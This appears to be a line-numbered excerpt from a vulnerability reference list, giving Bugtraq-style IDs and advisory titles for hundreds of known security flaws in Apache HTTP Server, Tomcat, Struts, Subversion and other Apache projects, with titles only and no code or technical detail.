14413| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
14414| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
14415| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
14416| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14417| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
14418| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
14419| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
14420| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
14421| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
14422| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
14423| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
14424| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
14425| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
14426| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
14427| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
14428| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
14429| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
14430| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
14431| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
14432| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
14433| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
14434| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
14435| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
14436| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
14437| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
14438| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
14439| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
14440| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
14441| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
14442| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
14443| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
14444| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
14445| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
14446| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
14447| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
14448| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
14449| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
14450| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
14451| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
14452| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
14453| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
14454| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
14455| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
14456| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
14457| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
14458| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
14459| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
14460| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
14461| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
14462| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
14463| [59670] Apache VCL Multiple Input Validation Vulnerabilities
14464| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
14465| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
14466| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
14467| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
14468| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
14469| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
14470| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
14471| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
14472| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
14473| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
14474| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
14475| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
14476| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
14477| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
14478| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
14479| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
14480| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
14481| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
14482| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
14483| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
14484| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
14485| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
14486| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
14487| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
14488| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
14489| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
14490| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
14491| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
14492| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
14493| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
14494| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
14495| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
14496| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
14497| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
14498| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
14499| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
14500| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
14501| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
14502| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
14503| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
14504| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
14505| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
14506| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
14507| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
14508| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
14509| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
14510| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
14511| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
14512| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
14513| [54798] Apache Libcloud Man In The Middle Vulnerability
14514| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
14515| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
14516| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
14517| [54189] Apache Roller Cross Site Request Forgery Vulnerability
14518| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
14519| [53880] Apache CXF Child Policies Security Bypass Vulnerability
14520| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
14521| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
14522| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
14523| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
14524| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
14525| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
14526| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
14527| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
14528| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
14529| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
14530| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
14531| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
14532| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
14533| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
14534| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
14535| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
14536| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
14537| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
14538| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
14539| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
14540| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
14541| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
14542| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
14543| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
14544| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
14545| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
14546| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
14547| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
14548| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
14549| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
14550| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
14551| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
14552| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
14553| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
14554| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
14555| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
14556| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
14557| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
14558| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
14559| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
14560| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
14561| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
14562| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
14563| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
14564| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
14565| [49290] Apache Wicket Cross Site Scripting Vulnerability
14566| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
14567| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
14568| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
14569| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
14570| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
14571| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
14572| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
14573| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
14574| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
14575| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
14576| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
14577| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
14578| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
14579| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
14580| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
14581| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
14582| [46953] Apache MPM-ITK Module Security Weakness
14583| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
14584| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
14585| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
14586| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
14587| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
14588| [46166] Apache Tomcat JVM Denial of Service Vulnerability
14589| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
14590| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
14591| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
14592| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
14593| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
14594| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
14595| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
14596| [44616] Apache Shiro Directory Traversal Vulnerability
14597| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
14598| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
14599| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
14600| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
14601| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
14602| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
14603| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
14604| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
14605| [42492] Apache CXF XML DTD Processing Security Vulnerability
14606| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
14607| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
14608| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
14609| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
14610| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
14611| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
14612| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
14613| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
14614| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
14615| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
14616| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
14617| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
14618| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
14619| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
14620| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
14621| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
14622| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
14623| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
14624| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
14625| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
14626| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
14627| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
14628| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
14629| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
14630| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
14631| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
14632| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
14633| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
14634| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
14635| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
14636| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
14637| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
14638| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
14639| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
14640| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
14641| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14642| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
14643| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
14644| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
14645| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
14646| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
14647| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
14648| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14649| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
14650| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
14651| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
14652| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
14653| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
14654| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
14655| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14656| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
14657| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
14658| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
14659| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
14660| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
14661| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
14662| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
14663| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
14664| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
14665| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
14666| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14667| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
14668| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
14669| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
14670| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
14671| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
14672| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
14673| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
14674| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
14675| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
14676| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
14677| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
14678| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
14679| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
14680| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
14681| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
14682| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
14683| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
14684| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
14685| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
14686| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
14687| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
14688| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
14689| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
14690| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
14691| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
14692| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
14693| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
14694| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
14695| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
14696| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
14697| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
14698| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
14699| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
14700| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
14701| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
14702| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
14703| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
14704| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
14705| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
14706| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
14707| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
14708| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
14709| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
14710| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
14711| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
14712| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
14713| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
14714| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
14715| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
14716| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
14717| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
14718| [20527] Apache Mod_TCL Remote Format String Vulnerability
14719| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
14720| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
14721| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
14722| [19106] Apache Tomcat Information Disclosure Vulnerability
14723| [18138] Apache James SMTP Denial Of Service Vulnerability
14724| [17342] Apache Struts Multiple Remote Vulnerabilities
14725| [17095] Apache Log4Net Denial Of Service Vulnerability
14726| [16916] Apache mod_python FileSession Code Execution Vulnerability
14727| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
14728| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
14729| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
14730| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
14731| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
14732| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
14733| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
14734| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
14735| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
14736| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
14737| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
14738| [15177] PHP Apache 2 Local Denial of Service Vulnerability
14739| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
14740| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
14741| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
14742| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
14743| [14106] Apache HTTP Request Smuggling Vulnerability
14744| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
14745| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
14746| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
14747| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
14748| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
14749| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
14750| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
14751| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
14752| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
14753| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
14754| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
14755| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
14756| [11471] Apache mod_include Local Buffer Overflow Vulnerability
14757| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
14758| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
14759| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
14760| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
14761| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
14762| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
14763| [11094] Apache mod_ssl Denial Of Service Vulnerability
14764| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
14765| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
14766| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
14767| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
14768| [10478] ClueCentral Apache Suexec Patch Security Weakness
14769| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
14770| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
14771| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
14772| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
14773| [9921] Apache Connection Blocking Denial Of Service Vulnerability
14774| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
14775| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
14776| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
14777| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
14778| [9733] Apache Cygwin Directory Traversal Vulnerability
14779| [9599] Apache mod_php Global Variables Information Disclosure Weakness
14780| [9590] Apache-SSL Client Certificate Forging Vulnerability
14781| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
14782| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
14783| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
14784| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
14785| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
14786| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
14787| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
14788| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
14789| [8898] Red Hat Apache Directory Index Default Configuration Error
